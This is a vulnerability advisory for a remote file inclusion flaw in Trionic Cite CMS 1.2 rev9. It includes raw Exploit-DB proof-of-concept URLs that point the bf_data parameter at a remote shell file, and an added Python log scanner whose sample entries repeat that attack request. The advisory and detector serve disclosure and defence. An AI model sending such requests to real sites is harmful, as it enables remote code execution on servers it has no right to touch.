Vendor: Cite CMS
By: milw0rm.com
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: Cite CMS
Affected Version From: 1.2 rev9
Affected Version To: 1.2 rev9
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Trionic Cite CMS 1.2 rev9 Remote File Inclusion Vulnerabilities

Trionic Cite CMS 1.2 rev9 is vulnerable to remote file inclusion. An attacker can exploit this by manipulating the 'bf_data' parameter of the '/interface/editors/-custom.php' and '/interface/editors/custom.php' scripts so that they include a malicious file from a remote server, which can lead to arbitrary code execution on the affected system.

Mitigation:

To mitigate this vulnerability, update to a patched version of Trionic Cite CMS or apply any security patches the vendor provides. Additionally, implement proper input validation and sanitization to prevent remote file inclusion attacks.

Exploit-DB raw data:

# Trionic Cite CMS 1.2 rev9 Remote File Inclusion Vulnerabilities
# D.S : http://sourceforge.net/project/showfiles.php?group_id=177347
# POC :
# /[PHAT]/interface/editors/-custom.php?bField[bf_data]=http://localhost/shell.txt
# /[PHAT]/interface/editors/custom.php?bField[bf_data]=http://localhost/shell.txt

# milw0rm.com [2007-10-05]
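
For defenders reviewing logs, the following added example (not part of the original advisory or of the Cite CMS code) flags requests to the two editor scripts whose bField[bf_data] value looks like a remote location. The combined access-log format, the function name flag_rfi_attempts and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script paths named in the advisory, matched as a suffix because the install prefix varies.
EDITOR_SCRIPTS = ("/interface/editors/-custom.php", "/interface/editors/custom.php")
PARAM = "bField[bf_data]"
# Value shaped like "scheme:", a protocol-relative "//host", or a UNC path.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)", re.IGNORECASE)
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def flag_rfi_attempts(log_lines):
    """Return (line_number, path, value) for requests that put a remote-looking
    value in bField[bf_data] on one of the affected editor scripts."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.lower().endswith(EDITOR_SCRIPTS):
            continue
        # parse_qsl percent-decodes names and values, so bField%5Bbf_data%5D is caught too.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if name == PARAM and REMOTE_VALUE.match(value):
                hits.append((number, target.path, value))
    return hits


# Constructed sample log lines (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Oct/2007:10:01:02 +0000] "GET /cms/interface/editors/custom.php?bField[bf_data]=http://remote.example/x.txt HTTP/1.1" 200 512',
    '198.51.100.7 - - [05/Oct/2007:10:01:09 +0000] "GET /cms/interface/editors/-custom.php?bField%5Bbf_data%5D=HTTP%3A%2F%2Fremote.example%2Fx.txt HTTP/1.1" 200 512',
    '203.0.113.20 - - [05/Oct/2007:10:02:30 +0000] "GET /cms/interface/editors/custom.php?bField[bf_data]=intro HTTP/1.1" 200 2048',
    '203.0.113.20 - - [05/Oct/2007:10:03:11 +0000] "GET /cms/index.php?page=http://remote.example/ HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for number, path, value in flag_rfi_attempts(SAMPLE_LOG):
        print(f"line {number}: {path} bf_data={value!r}")
```

Access logs record only the query string, so a value sent in a POST body would not appear here and needs request-body logging or a WAF rule to observe.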